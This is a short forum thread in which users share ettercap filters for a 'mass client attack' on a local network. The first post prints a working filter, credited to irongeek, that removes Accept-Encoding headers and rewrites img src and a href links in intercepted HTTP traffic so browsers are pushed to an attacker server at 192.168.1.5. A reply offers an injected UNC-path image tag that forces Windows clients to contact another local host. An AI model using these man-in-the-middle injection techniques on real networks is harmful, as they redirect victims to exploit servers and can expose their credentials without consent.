Results 1 to 2 of 2

Thread: mass client attack - ettercap filter

Hybrid View

  1. #1
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008
    Posts
    213

    Default

    so with the fast-track mass client attack i would like to some how use a ettercap filter to force a client to visit the server... I hope some one can give me a little help with the filter...

    this is what i have tried
    Code:
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!"); 
          # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }
    if (ip.proto == TCP && tcp.src == 80) {
       replace("img src=", "img src=\"http://192.168.1.5\" ");
       replace("IMG SRC=", "img src=\"http://192.168.1.5\" ");
       msg("Filter Ran.\n");
    }
    this is the filter from irongeek!
    i new this would not work before i tried it... i just want to give a good example of what i would like to accomplish

    Lol nvm i figured it out... its kinda cool

    replace("a href=", "a href=\"http://192.168.1.5\" ");
    replace("a href=", "a href=\"http://192.168.1.5\" "

    change this in the filter... this works some what... ill test a little more

  2. #2
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    9

    Default

    if its on your local network you can try something like this
    "<img src=\"\\\\192.168.1.10\\"> "

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •